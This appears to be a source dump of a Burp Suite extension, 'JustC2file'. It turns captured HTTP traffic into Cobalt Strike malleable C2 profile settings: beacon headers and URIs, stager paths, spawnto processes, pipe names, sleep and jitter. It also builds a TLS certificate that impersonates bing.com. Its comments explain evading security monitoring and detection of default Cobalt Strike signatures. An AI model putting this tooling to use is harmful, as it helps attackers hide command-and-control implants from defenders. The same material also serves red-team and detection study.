        httpGetBeacon.setGet_server_encode(analyzeInfo.getEncode());
        if (analyzeInfo.isExistResponseBody(callbacks, message)) {
            String resp = new String(message.getResponse());
            int bodyOffset = analyzeResponse.getBodyOffset();
            List<String> list = analyzeInfo.analyzeBody(resp.substring(bodyOffset));
            httpGetBeacon.setGet_server_prepend(list.get(1));
            httpGetBeacon.setGet_server_prepend2(list.get(0));
            httpGetBeacon.setGet_server_append(list.get(2));
        } else {
            httpGetBeacon.setGet_server_prepend("");
            httpGetBeacon.setGet_server_prepend2("");
            httpGetBeacon.setGet_server_append("");
        }
        return httpGetBeacon;
    }

    @Override
    public Map<String, String> putdataHttpGetBeacon() {
        dataMap.put("http_get_uri", httpGetBeacon.getUri());
        dataMap.put("get_client_header1", httpGetBeacon.getGet_client_header1());
        dataMap.put("get_client_header2", httpGetBeacon.getGet_client_header2());
        dataMap.put("get_client_header3", httpGetBeacon.getGet_client_header3());
        dataMap.put("get_client_header4", httpGetBeacon.getGet_client_header4());
        dataMap.put("http_get_host", httpGetBeacon.getHost());
        dataMap.put("http_getReq_Server", httpGetBeacon.getGet_server_server());
        dataMap.put("http_getReq_ContentType", httpGetBeacon.getGet_server_contentType());
        dataMap.put("get_server_header1", httpGetBeacon.getGet_server_header1());
        dataMap.put("get_server_header2", httpGetBeacon.getGet_server_header2());
        dataMap.put("get_server_header3", httpGetBeacon.getGet_server_header3());
        dataMap.put("get_server_header4", httpGetBeacon.getGet_server_header4());
        //dataMap.put("get_metadata_encode",httpGetBeacon.getGet_metadata_encode());
        dataMap.put("get_server_encode", httpGetBeacon.getGet_server_encode());
        dataMap.put("get_server_prepend", httpGetBeacon.getGet_server_prepend());
        dataMap.put("get_server_prepend2", httpGetBeacon.getGet_server_prepend2());
        dataMap.put("get_server_append", httpGetBeacon.getGet_server_append());
        return dataMap;
    }

    // Extract the request path from the GET request line, without the query string
    public String lookUri(List<String> headers) {
        String uri = "";
        for (String header : headers) {
            if (header.startsWith("GET")) {
                uri = header.split("\\s+")[1].split("[?]")[0];
            }
        }
        return uri;
    }


}
-------------------------------------------------------------------------------- /src/main/java/com/test/burp/dao/impl/HttpPostBeaconDaoImpl.java: -------------------------------------------------------------------------------- 1 | package com.test.burp.dao.impl; 2 | 3 | import burp.IBurpExtenderCallbacks; 4 | import burp.IHttpRequestResponse; 5 | import burp.IRequestInfo; 6 | import burp.IResponseInfo; 7 | import com.test.burp.dao.HttpPostBeaconDao; 8 | import com.test.burp.model.HttpPostBeacon; 9 | 10 | import java.io.IOException; 11 | import java.util.*; 12 | import java.util.stream.Collectors; 13 | 14 | /** 15 | * @program: JustC2file 16 | * @author: Peithon 17 | * @github: https://github.com/Peithon/JustC2file 18 | * @create: 2022-01-10 15:44 19 | **/ 20 | public class HttpPostBeaconDaoImpl implements HttpPostBeaconDao { 21 | private HttpPostBeacon httpPostBeacon = new HttpPostBeacon(); 22 | private Map dataMap = new HashMap(); 23 | private AnalyzeInfo analyzeInfo = new AnalyzeInfo(); 24 | private LoadFile file = new LoadFile(); 25 | @Override 26 | public HttpPostBeacon dataHttpPostBeacon(IBurpExtenderCallbacks callbacks, IHttpRequestResponse message) { 27 | byte[] req = message.getRequest(); 28 | IRequestInfo analyzedRequest = callbacks.getHelpers().analyzeRequest(req); 29 | List headers = analyzedRequest.getHeaders(); 30 | List listhead = analyzeInfo.formatHeaders(analyzeInfo.lookHeaders(headers)); 31 | httpPostBeacon.setPost_client_header1(listhead.get(0)); 32 | httpPostBeacon.setPost_client_header2(listhead.get(1)); 33 | httpPostBeacon.setPost_client_header3(listhead.get(2)); 34 | httpPostBeacon.setPost_client_header4(listhead.get(3)); 35 | httpPostBeacon.setHttp_post_uri(analyzeInfo.formatUri(lookUri(headers))); 36 | httpPostBeacon.setHttp_post_host(analyzeInfo.lookHost(headers)); 37 | httpPostBeacon.setPost_client_content(analyzeInfo.lookContentType(headers)); 38 | List param = lookParameter(); 39 | httpPostBeacon.setPost_client_parameter1(param.get(0)); 
40 | httpPostBeacon.setPost_client_parameter2(param.get(1)); 41 | httpPostBeacon.setPost_client_parameter3(param.get(2)); 42 | //httpPostBeacon.setPost_client_encode(analyzeInfo.getEncode()); 43 | IResponseInfo analyzeResponse = callbacks.getHelpers().analyzeResponse(message.getResponse()); 44 | List iheaders = analyzeResponse.getHeaders(); 45 | List listihead = analyzeInfo.formatHeaders(analyzeInfo.lookHeaders(iheaders)); 46 | httpPostBeacon.setPost_server_header1(listihead.get(0)); 47 | httpPostBeacon.setPost_server_header2(listihead.get(1)); 48 | httpPostBeacon.setPost_server_header3(listihead.get(2)); 49 | httpPostBeacon.setPost_server_header4(listihead.get(3)); 50 | httpPostBeacon.setPost_server_server(analyzeInfo.lookServer(iheaders)); 51 | httpPostBeacon.setPost_server_content(analyzeInfo.lookContentType(iheaders)); 52 | httpPostBeacon.setPost_server_encode(analyzeInfo.getEncode()); 53 | if(analyzeInfo.isExistResponseBody(callbacks,message)) { 54 | String resp = new String(message.getResponse()); 55 | int bodyOffset = analyzeResponse.getBodyOffset(); 56 | List list = analyzeInfo.analyzeBody(resp.substring(bodyOffset)); 57 | //第二行 58 | httpPostBeacon.setPost_server_prepend(list.get(1)); 59 | //第一行 60 | httpPostBeacon.setPost_server_prepend2(list.get(0)); 61 | httpPostBeacon.setPost_server_append(list.get(2)); 62 | }else{ 63 | httpPostBeacon.setPost_server_prepend(""); 64 | httpPostBeacon.setPost_server_prepend2(""); 65 | httpPostBeacon.setPost_server_append(""); 66 | } 67 | return httpPostBeacon; 68 | } 69 | 70 | @Override 71 | public Map putdataHttpPostBeacon() { 72 | dataMap.put("http_post_uri",httpPostBeacon.getHttp_post_uri()); 73 | dataMap.put("post_client_content",httpPostBeacon.getPost_client_content()); 74 | dataMap.put("post_client_header1",httpPostBeacon.getPost_client_header1()); 75 | dataMap.put("post_client_header2",httpPostBeacon.getPost_client_header2()); 76 | dataMap.put("post_client_header3",httpPostBeacon.getPost_client_header3()); 77 | 
dataMap.put("post_client_header4",httpPostBeacon.getPost_client_header4()); 78 | dataMap.put("http_post_host",httpPostBeacon.getHttp_post_host()); 79 | dataMap.put("post_client_parameter1",httpPostBeacon.getPost_client_parameter1()); 80 | dataMap.put("post_client_parameter2",httpPostBeacon.getPost_client_parameter2()); 81 | dataMap.put("post_client_parameter3",httpPostBeacon.getPost_client_parameter3()); 82 | dataMap.put("post_server_server",httpPostBeacon.getPost_server_server()); 83 | dataMap.put("post_server_content",httpPostBeacon.getPost_server_content()); 84 | dataMap.put("post_server_header1",httpPostBeacon.getPost_server_header1()); 85 | dataMap.put("post_server_header2",httpPostBeacon.getPost_server_header2()); 86 | dataMap.put("post_server_header3",httpPostBeacon.getPost_server_header3()); 87 | dataMap.put("post_server_header4",httpPostBeacon.getPost_server_header4()); 88 | //dataMap.put("post_client_encode",httpPostBeacon.getPost_client_encode()); 89 | dataMap.put("post_server_encode",httpPostBeacon.getPost_server_encode()); 90 | dataMap.put("post_server_prepend",httpPostBeacon.getPost_server_prepend()); 91 | dataMap.put("post_server_prepend2",httpPostBeacon.getPost_server_prepend2()); 92 | dataMap.put("post_server_append",httpPostBeacon.getPost_server_append()); 93 | return dataMap; 94 | } 95 | 96 | public String lookUri(List headers){ 97 | String uri = ""; 98 | for (String header : headers) { 99 | if (header.startsWith("POST")) { 100 | uri = header.split("\\s+")[1].split("[?]")[0]; 101 | } 102 | } 103 | return uri; 104 | } 105 | 106 | public List lookParameter(){ 107 | int randnum = new Random().nextInt(2)+2; 108 | List list = new ArrayList<>(searchParam(randnum)); 109 | List line = new ArrayList<>(); 110 | String str = "qwertyuiopasdfghjklzxcvbnmZXCVBNMLKJHGFDSAQWERTYUIOP"; 111 | for (int i = 0; i< 3;i++){ 112 | line.add(i,""); 113 | } 114 | for (int j = 0; j < randnum; j++){ 115 | //将字符str顺序打乱 116 | String[] liststr= str.split(""); 117 | 
StringBuilder strBuff = new StringBuilder(); 118 | Collections.shuffle(Arrays.asList(liststr)); 119 | StringBuilder out= new StringBuilder(""); 120 | for(String s:liststr){ 121 | out.append(s); 122 | } 123 | str = out.toString(); 124 | int num = new Random().nextInt(7)+6; 125 | for (int i = 0 ; i < num; i++){ 126 | int number = new Random().nextInt(str.length()); 127 | strBuff.append(str.charAt(number)); 128 | } 129 | line.set(j,"parameter \""+list.get(j)+"\" \""+strBuff+"\";"); 130 | } 131 | return line; 132 | } 133 | 134 | public List searchParam(int randnum) { 135 | List list = new ArrayList<>(); 136 | for (int i=0; i < randnum; i++){ 137 | try { 138 | list.add(file.readLine("parameters")); 139 | } catch (IOException e) { 140 | e.printStackTrace(); 141 | } 142 | } 143 | list = list.stream().distinct().collect(Collectors.toList()); 144 | if (list.size() == randnum){ 145 | return list; 146 | }else { 147 | return searchParam(randnum); 148 | } 149 | } 150 | } 151 | -------------------------------------------------------------------------------- /src/main/java/com/test/burp/dao/impl/HttpStagerDaoImpl.java: -------------------------------------------------------------------------------- 1 | package com.test.burp.dao.impl; 2 | 3 | import burp.IBurpExtenderCallbacks; 4 | import burp.IHttpRequestResponse; 5 | import burp.IRequestInfo; 6 | import burp.IResponseInfo; 7 | import com.test.burp.dao.HttpStagerDao; 8 | import com.test.burp.model.HttpStager; 9 | 10 | import java.io.IOException; 11 | import java.util.HashMap; 12 | import java.util.List; 13 | import java.util.Map; 14 | 15 | /** 16 | * @program: JustC2file 17 | * @author: Peithon 18 | * @github: https://github.com/Peithon/JustC2file 19 | * @create: 2022-01-11 14:55 20 | **/ 21 | public class HttpStagerDaoImpl implements HttpStagerDao { 22 | //需要多个stager时换成List 23 | //List list = new ArrayList(); 24 | private HttpStager httpStager = new HttpStager(); 25 | private LoadFile file = new LoadFile(); 26 | private 
AnalyzeInfo analyzeInfo = new AnalyzeInfo(); 27 | private Map dataMap = new HashMap(); 28 | @Override 29 | public HttpStager dataHttpStager(IBurpExtenderCallbacks callbacks, IHttpRequestResponse message) { 30 | 31 | IResponseInfo analyzeResponse = callbacks.getHelpers().analyzeResponse(message.getResponse()); 32 | List iheaders = analyzeResponse.getHeaders(); 33 | List listihead = analyzeInfo.formatHeaders(analyzeInfo.lookHeaders(iheaders)); 34 | httpStager.setServer_header1(listihead.get(0)); 35 | httpStager.setServer_header2(listihead.get(1)); 36 | httpStager.setServer_header3(listihead.get(2)); 37 | httpStager.setServer_header4(listihead.get(3)); 38 | httpStager.setServer_Content_Type(analyzeInfo.lookContentType(iheaders)); 39 | httpStager.setServer_Server(analyzeInfo.lookServer(iheaders)); 40 | // httpStager.setOutput_encode(analyzeInfo.getEncode()); 41 | if(analyzeInfo.isExistResponseBody(callbacks,message)){ 42 | String resp = new String(message.getResponse()); 43 | int bodyOffset = analyzeResponse.getBodyOffset(); 44 | List list = analyzeInfo.analyzeBody(resp.substring(bodyOffset)); 45 | httpStager.setOutput_prepend(list.get(1)); 46 | httpStager.setOutput_prepend2(list.get(0)); 47 | httpStager.setOutput_append(list.get(2)); 48 | }else{ 49 | httpStager.setOutput_prepend(""); 50 | httpStager.setOutput_prepend2(""); 51 | httpStager.setOutput_append(""); 52 | } 53 | byte[] req = message.getRequest(); 54 | IRequestInfo analyzedRequest = callbacks.getHelpers().analyzeRequest(req); 55 | List headers = analyzedRequest.getHeaders(); 56 | httpStager.setClient_Accept(lookAccept(headers)); 57 | try { 58 | String stager_uri = lookStager_uri(); 59 | if(stager_uri.split("/").length < 2){ 60 | httpStager.setUri_x86(stager_uri.split("\\s+")[0]); 61 | httpStager.setUri_x64(stager_uri.split("\\s+")[1]); 62 | }else { 63 | httpStager.setUri_x86(lookUri(headers)); 64 | httpStager.setUri_x64("/_"+lookUri(headers)); 65 | } 66 | 67 | } catch (IOException e) { 68 | 
e.printStackTrace(); 69 | } 70 | return httpStager; 71 | } 72 | 73 | @Override 74 | public Map putdataHttpStager() { 75 | dataMap.put("stager_uri_x86",httpStager.getUri_x86()); 76 | dataMap.put("stager_uri_x64",httpStager.getUri_x64()); 77 | dataMap.put("stager_server_ContentType",httpStager.getServer_Content_Type()); 78 | dataMap.put("stager_server_Server",httpStager.getServer_Server()); 79 | dataMap.put("stager_server_header1",httpStager.getServer_header1()); 80 | dataMap.put("stager_server_header2",httpStager.getServer_header2()); 81 | dataMap.put("stager_server_header3",httpStager.getServer_header3()); 82 | dataMap.put("stager_server_header4",httpStager.getServer_header4()); 83 | dataMap.put("stager_client_Accept",httpStager.getClient_Accept()); 84 | dataMap.put("stager_output_prepend",httpStager.getOutput_prepend()); 85 | dataMap.put("stager_output_append",httpStager.getOutput_append()); 86 | // dataMap.put("stager_output_encode",httpStager.getOutput_encode()); 87 | dataMap.put("stager_output_prepend2",httpStager.getOutput_prepend2()); 88 | return dataMap; 89 | } 90 | 91 | public String lookStager_uri() throws IOException { 92 | return file.readLine("stager_uri"); 93 | } 94 | 95 | public String lookUri(List headers){ 96 | String uri = ""; 97 | for (String header : headers) { 98 | if (header.startsWith("GET")) { 99 | uri = header.split("\\s+")[1].split("[?]")[0]; 100 | break; 101 | }else if(header.startsWith("POST")){ 102 | uri = header.split("\\s+")[1].split("[?]")[0]; 103 | break; 104 | } 105 | } 106 | return uri; 107 | } 108 | 109 | public String lookAccept(List headers){ 110 | String accept = "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"; 111 | for (String header : headers) { 112 | if (header.startsWith("Accept:")) { 113 | accept = header.split("[:]\\s+")[1].trim(); 114 | break; 115 | } 116 | } 117 | return accept; 118 | } 119 | } 120 | -------------------------------------------------------------------------------- 
/src/main/java/com/test/burp/dao/impl/HttpsCertificateDaoImpl.java: -------------------------------------------------------------------------------- 1 | package com.test.burp.dao.impl; 2 | 3 | import com.test.burp.dao.HttpsCertificateDao; 4 | import com.test.burp.model.HttpsCertificate; 5 | 6 | import java.util.HashMap; 7 | import java.util.List; 8 | import java.util.Map; 9 | import java.util.Random; 10 | 11 | import static java.util.Arrays.asList; 12 | /** 13 | * @program: JustC2file 14 | * @author: Peithon 15 | * @create: 2022-01-08 09:09 16 | **/ 17 | public class HttpsCertificateDaoImpl implements HttpsCertificateDao { 18 | private HttpsCertificate httpsCertificate= new HttpsCertificate(); 19 | Map dataMap = new HashMap(); 20 | 21 | @Override 22 | public HttpsCertificate dataHttpsCertificate() { 23 | httpsCertificate.setC(lookCertificateC()); 24 | httpsCertificate.setCn(lookCertificateCN()); 25 | httpsCertificate.setO(lookCertificateOU()); 26 | httpsCertificate.setOu(lookCertificateOU()); 27 | httpsCertificate.setValidity(lookCertificateV()); 28 | return httpsCertificate; 29 | } 30 | 31 | @Override 32 | public Map putdataHttpsCertificate() { 33 | /* 34 | * CS在创建Beacon HTTPS监听时,是包含SSL证书的,该证书是CS默认的证书,其中包含了CobaltStrike等关键字信息,不修改的情况下,会被直接监测到。 35 | * */ 36 | dataMap.put("https_certificate_C",httpsCertificate.getC()); 37 | dataMap.put("https_certificate_V",httpsCertificate.getValidity()); 38 | dataMap.put("https_certificate_CN",httpsCertificate.getCn()); 39 | dataMap.put("https_certificate_OU",httpsCertificate.getOu()); 40 | dataMap.put("https_certificate_O",httpsCertificate.getO()); 41 | return dataMap; 42 | } 43 | public String lookCertificateC(){ 44 | //Certificate C 的值 45 | List certlistc = asList( 46 | "AF", "AX", "AL", "DZ", "AS", "AD", "AO", "AI", "AQ", "AG", "AR", 47 | "AM", "AW", "AU", "AT", "AZ", "BS", "BH", "BD", "BB", "BY", "BE", 48 | "BZ", "BJ", "BM", "BT", "BO", "BQ", "BA", "BW", "BV", "BR", "IO", 49 | "BN", "BG", "BF", "BI", "CV", "KH", "CM", "CA", 
"KY", "CF", "TD", 50 | "CL", "CN", "CX", "CC", "CO", "KM", "CG", "CD", "CK", "CR", "CI", 51 | "HR", "CU", "CW", "CY", "CZ", "DK", "DJ", "DM", "DO", "EC", "EG", 52 | "SV", "GQ", "ER", "EE", "ET", "FK", "FO", "FJ", "FI", "FR", "GF", 53 | "PF", "TF", "GA", "GM", "GE", "DE", "GH", "GI", "GR", "GL", "GD", 54 | "GP", "GU", "GT", "GG", "GN", "GW", "GY", "HT", "HM", "VA", "HN", 55 | "HK", "HU", "IS", "IN", "ID", "IR", "IQ", "IE", "IM", "IL", "IT", 56 | "JM", "JP", "JE", "JO", "KZ", "KE", "KI", "KP", "KR", "KW", "KG", 57 | "LA", "LV", "LB", "LS", "LR", "LY", "LI", "LT", "LU", "MO", "MK", 58 | "MG", "MW", "MY", "MV", "ML", "MT", "MH", "MQ", "MR", "MU", "YT", 59 | "MX", "FM", "MD", "MC", "MN", "ME", "MS", "MA", "MZ", "MM", "NA", 60 | "NR", "NP", "NL", "NC", "NZ", "NI", "NE", "NG", "NU", "NF", "MP", 61 | "NO", "OM", "PK", "PW", "PS", "PA", "PG", "PY", "PE", "PH", "PN", 62 | "PL", "PT", "PR", "QA", "RE", "RO", "RU", "RW", "BL", "SH", "KN", 63 | "LC", "MF", "PM", "VC", "WS", "SM", "ST", "SA", "SN", "RS", "SC", 64 | "SL", "SG", "SX", "SK", "SI", "SB", "SO", "ZA", "GS", "SS", "ES", 65 | "LK", "SD", "SR", "SJ", "SZ", "SE", "CH", "SY", "TW", "TJ", "TZ", 66 | "TH", "TL", "TG", "TK", "TO", "TT", "TN", "TR", "TM", "TC", "TV", 67 | "UG", "UA", "AE", "GB", "US", "UM", "UY", "UZ", "VU", "VE", "VN", 68 | "VG", "VI", "WF", "EH", "YE", "ZM", "ZW" 69 | ); 70 | return certlistc.get(new Random().nextInt(certlistc.size())); 71 | } 72 | 73 | public String lookCertificateV(){ 74 | return "365"; 75 | } 76 | 77 | public String lookCertificateCN(){ 78 | return "www.bing.com"; 79 | } 80 | public String lookCertificateOU(){ 81 | return "bing.com"; 82 | } 83 | } 84 | -------------------------------------------------------------------------------- /src/main/java/com/test/burp/dao/impl/LoadFile.java: -------------------------------------------------------------------------------- 1 | package com.test.burp.dao.impl; 2 | 3 | import org.apache.commons.io.IOUtils; 4 | 5 | import java.io.IOException; 6 | 
import java.io.InputStream; 7 | import java.util.List; 8 | import java.util.Random; 9 | /** 10 | * @program: JustC2file 11 | * @author: Peithon 12 | * @create: 2022-01-08 09:09 13 | **/ 14 | public class LoadFile { 15 | public String readLine(String filename) throws IOException{ 16 | String line = ""; 17 | InputStream input = this.getClass().getResourceAsStream("/wordlists/"+filename); 18 | try { 19 | //assert input != null; 20 | List lines = IOUtils.readLines(input,"UTF-8"); 21 | line = lines.get(new Random().nextInt(lines.size())).trim(); 22 | } catch (IOException e) { 23 | e.printStackTrace(); 24 | } 25 | return line; 26 | } 27 | } 28 | 29 | -------------------------------------------------------------------------------- /src/main/java/com/test/burp/dao/impl/PersiancatDaoImpl.java: -------------------------------------------------------------------------------- 1 | package com.test.burp.dao.impl; 2 | 3 | import com.test.burp.dao.PersiancatDao; 4 | import com.test.burp.model.Persiancat; 5 | 6 | import java.io.IOException; 7 | import java.text.SimpleDateFormat; 8 | import java.util.Date; 9 | import java.util.HashMap; 10 | import java.util.Map; 11 | import java.util.Random; 12 | /** 13 | * @program: JustC2file 14 | * @author: Peithon 15 | * @create: 2022-01-08 09:09 16 | **/ 17 | public class PersiancatDaoImpl implements PersiancatDao { 18 | private Persiancat persiancat= new Persiancat(); 19 | private LoadFile file = new LoadFile(); 20 | Map dataMap = new HashMap(); 21 | @Override 22 | public Persiancat dataPersiancat() { 23 | persiancat.setTimestamp(lookTimestamp()); 24 | persiancat.setSample_name(lookSample_name()); 25 | persiancat.setSleeptime(lookSleeptime()); 26 | persiancat.setJitter(lookJitter()); 27 | persiancat.setData_jitter(lookDataJitter()); 28 | persiancat.setHost_stage(lookHost_stage()); 29 | persiancat.setTcp_port(lookTcp_port()); 30 | try { 31 | persiancat.setUseragent(file.readLine("useragents")); 32 | } catch (IOException e) { 33 | 
e.printStackTrace(); 34 | } 35 | return persiancat; 36 | } 37 | 38 | @Override 39 | public Map putdataPersiancat() { 40 | dataMap.put("timestamp", persiancat.getTimestamp()); 41 | dataMap.put("sample_name", persiancat.getSample_name()); 42 | dataMap.put("sleeptime",persiancat.getSleeptime()); 43 | dataMap.put("jitter",persiancat.getJitter()); 44 | dataMap.put("data_jitter",persiancat.getData_jitter()); 45 | dataMap.put("useragent",persiancat.getUseragent()); 46 | /* 47 | * 默认的DNS_IDLE为0.0.0.0,也可能被监听到 48 | * */ 49 | dataMap.put("tcp_port",persiancat.getTcp_port()); 50 | /* 51 | CS会在目标机放一个小的payload,然后由这个小的payload去下载大马,这个过程是个分段过程,不是一次下载回来的; 52 | 其中下载请求相关的流量特征,可以通过http-stager来定义 53 | */ 54 | dataMap.put("host_stage",persiancat.getHost_stage()); 55 | return dataMap; 56 | } 57 | 58 | public String lookTimestamp(){ 59 | // C2配置文件创建时间 60 | return new SimpleDateFormat("yyyy-MM-dd HH:mm:ss").format(new Date()); 61 | } 62 | 63 | public String lookSample_name(){ 64 | //脚本名称 65 | return "CobaltStrike Beacon"; 66 | } 67 | public String lookSleeptime(){ 68 | //sleeptime 设置用于配置 Beacons 默认签入的频率(以毫秒为单位),默认60秒。 69 | return String.valueOf((new Random().nextInt(25)+30)*1000); 70 | } 71 | public String lookJitter(){ 72 | /*jitter用于按指定的百分比改变签入间隔;它接受 0 - 99 的值。 73 | 例如: 74 | set sleeptime "60000"; 75 | set jitter "20"; 76 | jitter(抖动率)指定的随机时间量,Beacons 将在 48(60-60*20%) 到 72(60+60*20%) 秒之间的任何时间签入。 77 | 增加签入抖动可以减少某些安全监控解决方案检测到的机会 78 | */ 79 | return String.valueOf(new Random().nextInt(20)+1); 80 | } 81 | 82 | public String lookDataJitter(){ 83 | /*将随机长度字符串(最多 data_jitter 值)附加到 http-get 和 http-post 服务器输出。 84 | */ 85 | return String.valueOf(new Random().nextInt(14)+97); 86 | } 87 | 88 | public String lookTcp_port(){ 89 | //默认端口是 4444。可以动态更改,但在切换到动态端口之前,将始终首先使用配置文件中设置的端口。 90 | return String.valueOf(new Random().nextInt(40000)+12500); 91 | } 92 | 93 | public String lookHost_stage(){ 94 | /*传输数据、Exp时,内容建议分段传输,和运输投资类似,分批的安全性比一次的更高。 95 | true表示进行分段传输,false表示不进行分段传输,这里默认配置为true 96 | */ 97 | return 
"true"; 98 | } 99 | } 100 | -------------------------------------------------------------------------------- /src/main/java/com/test/burp/dao/impl/PostExDaoImpl.java: -------------------------------------------------------------------------------- 1 | package com.test.burp.dao.impl; 2 | 3 | import com.test.burp.dao.PostExDao; 4 | import com.test.burp.model.PostEx; 5 | 6 | import java.io.IOException; 7 | import java.util.HashMap; 8 | import java.util.Map; 9 | /** 10 | * @program: JustC2file 11 | * @author: Peithon 12 | * @create: 2022-01-08 09:09 13 | **/ 14 | public class PostExDaoImpl implements PostExDao { 15 | private PostEx postEx = new PostEx(); 16 | private LoadFile file = new LoadFile(); 17 | Map dataMap = new HashMap(); 18 | @Override 19 | public PostEx dataPostEx() { 20 | try { 21 | String spawnto = lookSpawnto(); 22 | postEx.setSpawnto_x86(spawnto.split("\\s+")[0]); 23 | postEx.setSpawnto_x64(spawnto.split("\\s+")[1]); 24 | postEx.setPipename(file.readLine("pipename")); 25 | } catch (IOException e) { 26 | e.printStackTrace(); 27 | } 28 | return postEx; 29 | } 30 | 31 | @Override 32 | public Map putdataPostEx() { 33 | dataMap.put("spawnto_x86",postEx.getSpawnto_x86()); 34 | dataMap.put("spawnto_x64",postEx.getSpawnto_x64()); 35 | dataMap.put("pipename",postEx.getPipename()); 36 | return dataMap; 37 | } 38 | 39 | public String lookSpawnto() throws IOException { 40 | return file.readLine("spawnto"); 41 | } 42 | } 43 | -------------------------------------------------------------------------------- /src/main/java/com/test/burp/model/DnsBeacon.java: -------------------------------------------------------------------------------- 1 | package com.test.burp.model; 2 | 3 | /** 4 | * @program: JustC2file 5 | * @author: Peithon 6 | * @github: https://github.com/Peithon/JustC2file 7 | * @create: 2022-01-12 12:21 8 | **/ 9 | public class DnsBeacon { 10 | private String dns_idle; 11 | private String dns_max_txt; 12 | private String dns_sleep; 13 | private String 
dns_ttl; 14 | private String maxdns; 15 | private String dns_stager_prepend; 16 | private String dns_stager_subhost; 17 | private String beacon; 18 | private String get_A; 19 | private String get_AAAA; 20 | private String get_TXT; 21 | private String put_metadata; 22 | private String put_output; 23 | private String ns_response; 24 | 25 | public String getDns_idle() { 26 | return dns_idle; 27 | } 28 | 29 | public void setDns_idle(String dns_idle) { 30 | this.dns_idle = dns_idle; 31 | } 32 | 33 | public String getDns_max_txt() { 34 | return dns_max_txt; 35 | } 36 | 37 | public void setDns_max_txt(String dns_max_txt) { 38 | this.dns_max_txt = dns_max_txt; 39 | } 40 | 41 | public String getDns_sleep() { 42 | return dns_sleep; 43 | } 44 | 45 | public void setDns_sleep(String dns_sleep) { 46 | this.dns_sleep = dns_sleep; 47 | } 48 | 49 | public String getDns_ttl() { 50 | return dns_ttl; 51 | } 52 | 53 | public void setDns_ttl(String dns_ttl) { 54 | this.dns_ttl = dns_ttl; 55 | } 56 | 57 | public String getMaxdns() { 58 | return maxdns; 59 | } 60 | 61 | public void setMaxdns(String maxdns) { 62 | this.maxdns = maxdns; 63 | } 64 | 65 | public String getDns_stager_prepend() { 66 | return dns_stager_prepend; 67 | } 68 | 69 | public void setDns_stager_prepend(String dns_stager_prepend) { 70 | this.dns_stager_prepend = dns_stager_prepend; 71 | } 72 | 73 | public String getDns_stager_subhost() { 74 | return dns_stager_subhost; 75 | } 76 | 77 | public void setDns_stager_subhost(String dns_stager_subhost) { 78 | this.dns_stager_subhost = dns_stager_subhost; 79 | } 80 | 81 | public String getBeacon() { 82 | return beacon; 83 | } 84 | 85 | public void setBeacon(String beacon) { 86 | this.beacon = beacon; 87 | } 88 | 89 | public String getGet_A() { 90 | return get_A; 91 | } 92 | 93 | public void setGet_A(String get_A) { 94 | this.get_A = get_A; 95 | } 96 | 97 | public String getGet_AAAA() { 98 | return get_AAAA; 99 | } 100 | 101 | public void setGet_AAAA(String get_AAAA) { 102 | 
this.get_AAAA = get_AAAA; 103 | } 104 | 105 | public String getGet_TXT() { 106 | return get_TXT; 107 | } 108 | 109 | public void setGet_TXT(String get_TXT) { 110 | this.get_TXT = get_TXT; 111 | } 112 | 113 | public String getPut_metadata() { 114 | return put_metadata; 115 | } 116 | 117 | public void setPut_metadata(String put_metadata) { 118 | this.put_metadata = put_metadata; 119 | } 120 | 121 | public String getPut_output() { 122 | return put_output; 123 | } 124 | 125 | public void setPut_output(String put_output) { 126 | this.put_output = put_output; 127 | } 128 | 129 | public String getNs_response() { 130 | return ns_response; 131 | } 132 | 133 | public void setNs_response(String ns_response) { 134 | this.ns_response = ns_response; 135 | } 136 | } 137 | -------------------------------------------------------------------------------- /src/main/java/com/test/burp/model/HttpGetBeacon.java: -------------------------------------------------------------------------------- 1 | package com.test.burp.model; 2 | /** 3 | * @program: JustC2file 4 | * @author: Peithon 5 | * @create: 2022-01-08 09:09 6 | **/ 7 | public class HttpGetBeacon { 8 | private String uri; 9 | private String host; 10 | private String get_client_header1; 11 | private String get_client_header2; 12 | private String get_client_header3; 13 | private String get_client_header4; 14 | private String get_server_header1; 15 | private String get_server_header2; 16 | private String get_server_header3; 17 | private String get_server_header4; 18 | private String get_server_server; 19 | private String get_server_contentType; 20 | private String get_metadata_encode; 21 | private String get_server_encode; 22 | private String get_server_prepend; 23 | private String get_server_prepend2; 24 | private String get_server_append; 25 | 26 | public String getUri() { 27 | return uri; 28 | } 29 | 30 | public void setUri(String uri) { 31 | this.uri = uri; 32 | } 33 | 34 | public String getHost() { 35 | return host; 36 | } 37 | 38 
| public void setHost(String host) { 39 | this.host = host; 40 | } 41 | 42 | public String getGet_client_header1() { 43 | return get_client_header1; 44 | } 45 | 46 | public void setGet_client_header1(String get_client_header1) { 47 | this.get_client_header1 = get_client_header1; 48 | } 49 | 50 | public String getGet_client_header2() { 51 | return get_client_header2; 52 | } 53 | 54 | public void setGet_client_header2(String get_client_header2) { 55 | this.get_client_header2 = get_client_header2; 56 | } 57 | 58 | public String getGet_client_header3() { 59 | return get_client_header3; 60 | } 61 | 62 | public void setGet_client_header3(String get_client_header3) { 63 | this.get_client_header3 = get_client_header3; 64 | } 65 | 66 | public String getGet_client_header4() { 67 | return get_client_header4; 68 | } 69 | 70 | public void setGet_client_header4(String get_client_header4) { 71 | this.get_client_header4 = get_client_header4; 72 | } 73 | 74 | public String getGet_server_header1() { 75 | return get_server_header1; 76 | } 77 | 78 | public void setGet_server_header1(String get_server_header1) { 79 | this.get_server_header1 = get_server_header1; 80 | } 81 | 82 | public String getGet_server_header2() { 83 | return get_server_header2; 84 | } 85 | 86 | public void setGet_server_header2(String get_server_header2) { 87 | this.get_server_header2 = get_server_header2; 88 | } 89 | 90 | public String getGet_server_header3() { 91 | return get_server_header3; 92 | } 93 | 94 | public void setGet_server_header3(String get_server_header3) { 95 | this.get_server_header3 = get_server_header3; 96 | } 97 | 98 | public String getGet_server_header4() { 99 | return get_server_header4; 100 | } 101 | 102 | public void setGet_server_header4(String get_server_header4) { 103 | this.get_server_header4 = get_server_header4; 104 | } 105 | 106 | public String getGet_server_server() { 107 | return get_server_server; 108 | } 109 | 110 | public void setGet_server_server(String get_server_server) { 111 
        this.get_server_server = get_server_server;
    }

    public String getGet_server_contentType() {
        return get_server_contentType;
    }

    public void setGet_server_contentType(String get_server_contentType) {
        this.get_server_contentType = get_server_contentType;
    }

    public String getGet_metadata_encode() {
        return get_metadata_encode;
    }

    public void setGet_metadata_encode(String get_metadata_encode) {
        this.get_metadata_encode = get_metadata_encode;
    }

    public String getGet_server_encode() {
        return get_server_encode;
    }

    public void setGet_server_encode(String get_server_encode) {
        this.get_server_encode = get_server_encode;
    }

    public String getGet_server_prepend() {
        return get_server_prepend;
